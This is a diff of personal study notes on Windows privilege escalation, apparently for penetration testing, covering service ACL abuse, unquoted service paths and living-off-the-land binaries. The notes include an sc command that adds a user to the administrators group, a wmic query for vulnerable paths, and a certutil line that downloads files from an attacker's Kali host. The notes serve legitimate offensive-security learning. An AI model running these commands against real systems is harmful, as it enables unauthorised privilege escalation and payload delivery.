KhaelK138/KhaelK138.github.io/markdown/WindowsPrivilegeEscalation.md

 C:\Users\Public\reverseshell.exe
 ```

+**Abusing Service ACLs**
+- If we have full control over a service, we can use `sc` to modify the service
+- Something like `sc config {vulnerable_service} binpath="cmd /c net localgroup administrators {our_user} /add"` will do the trick
+	- Alternatively, we could provide a path to a malicious executable

 **Abusing Unquoted Service Paths**
 - This occurs when we can write to a service's main directory without being able to modify the current files
 - Can again be found using `wmic` in cmd:
 	- `wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """`
 	- These will list potentially vulnerable paths
 - Abusing this:
-	- Let's say a service path is in use like "C:\\Program Files\\Enterprise Agents\\Company Files\\GammaServ.exe"
+	- Let's say a service path is in use like `C:\Program Files\Enterprise Agents\Company Files\GammaServ.exe`
-	- Windows will first check for "C:\\Program.exe", then "C:\\Program Files\\Enterprise.exe", then "C:\\Program Files\\Enterprise Agents\\Company.exe", and finally "C:\\Program Files\\Enterprise Agents\\Company Files\\GammaServ.exe"
+	- Windows will first check for `C:\Program.exe`, then `C:\Program Files\Enterprise.exe`, then `C:\Program Files\Enterprise Agents\Company.exe`, and finally `C:\Program Files\Enterprise Agents\Company Files\GammaServ.exe`
-		- If we can write to the "C:\\Program Files\\Enterprise Agents\\" directory, we can make an executable called Company.exe, which will be used before the real one
+		- If we can write to the `C:\Program Files\Enterprise Agents\` directory, we can make an executable called `Company.exe`, which will be used before the real one
-	- Then, restart the service
+	- Then, restart the service somehow and our executable should run

 ## Abusing Other Windows Components

 **Living off of the Land**
 - [LOLBAS](https://lolbas-project.github.io/#) is a great resource similar to gtfobins
-- Microsoft signed files that have extra, unexpected functionality, such as:
+- Microsoft signed files that have extra, unexpected functionality, such as, executing code, compiling code, file operations, persistence, UAC bypass, credential theft, dumping process memory, surveillance, log evasion, and DLL side-loading/hijacking
-  - Executing code
-  - Compiling code
-  - File operations
-  - Persistence
-  - UAC bypass
-  - Credential theft
-  - Dumping process memory
-  - Surveillance
-  - Log evasion
-  - DLL side-loading/hijacking without relocation
+	- For example, `certutil` can download files with `certutil.exe -urlcache -split -f http://{kaliIP}/{file} {output_file}`

 **Using Scheduled Tasks**
 - Need to know who runs the scheduled tasks, what triggers are required, and what the tasks do